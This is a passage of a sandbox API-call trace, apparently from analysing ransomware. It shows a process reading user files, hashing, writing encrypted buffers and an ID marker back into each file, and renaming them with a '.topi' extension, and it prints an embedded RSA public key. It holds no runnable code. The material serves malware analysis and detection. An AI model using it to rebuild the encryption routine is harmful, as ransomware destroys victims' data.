returned 1 [0094.485] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.486] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.487] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.487] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.487] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.487] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.487] GetLastError () returned 0x0 [0094.487] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.487] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.488] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.488] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.488] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80b0) returned 0x99f52d8 [0094.488] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3778 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9018 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3a00 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9030 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9060 [0094.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9078 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.489] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9060 | out: hHeap=0x680000) returned 1 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9078 | out: hHeap=0x680000) returned 1 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9078 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9060 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9078 | out: hHeap=0x680000) returned 1 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9060 | out: hHeap=0x680000) returned 1 [0094.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.490] GetCurrentThreadId () returned 0x8c4 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1940 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.490] GetCurrentThreadId () returned 0x8c4 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.490] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9060 [0094.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9078 [0094.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9048 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9090 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9060 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9060 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.493] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.493] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9060 | out: hHeap=0x680000) returned 1 [0094.493] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x320fab0 [0094.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.493] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9090 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9078 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9048 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9030 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3a00 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.495] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x80a0, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80a0, lpOverlapped=0x0) returned 1 [0094.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.495] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x80a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.495] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.496] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.496] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.496] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.496] CloseHandle (hObject=0x6a8) returned 1 [0094.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.497] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iKQxeuzCSevEnfmn0gcx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ikqxeuzcsevenfmn0gcx.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iKQxeuzCSevEnfmn0gcx.mkv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ikqxeuzcsevenfmn0gcx.mkv.topi")) returned 1 [0094.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.498] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.500] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd2a50, ftCreationTime.dwHighDateTime=0x1d5bb93, ftLastAccessTime.dwLowDateTime=0xa1b6cd00, ftLastAccessTime.dwHighDateTime=0x1d5b7f5, ftLastWriteTime.dwLowDateTime=0xa1b6cd00, ftLastWriteTime.dwHighDateTime=0x1d5b7f5, nFileSizeHigh=0x0, nFileSizeLow=0x68da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iueS2lmfYi1KxXP3HbP.m4a", cAlternateFileName="IUES2L~1.M4A")) returned 1 [0094.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.500] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iueS2lmfYi1KxXP3HbP.m4a") returned=".m4a" [0094.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iueS2lmfYi1KxXP3HbP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iues2lmfyi1kxxp3hbp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.500] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=26842) returned 1 [0094.500] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.503] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x68b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.503] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.504] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.504] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.504] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x68da, lpOverlapped=0x0) returned 1 [0094.504] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.504] lstrlenA (lpString="-----BEGIN PUBLIC 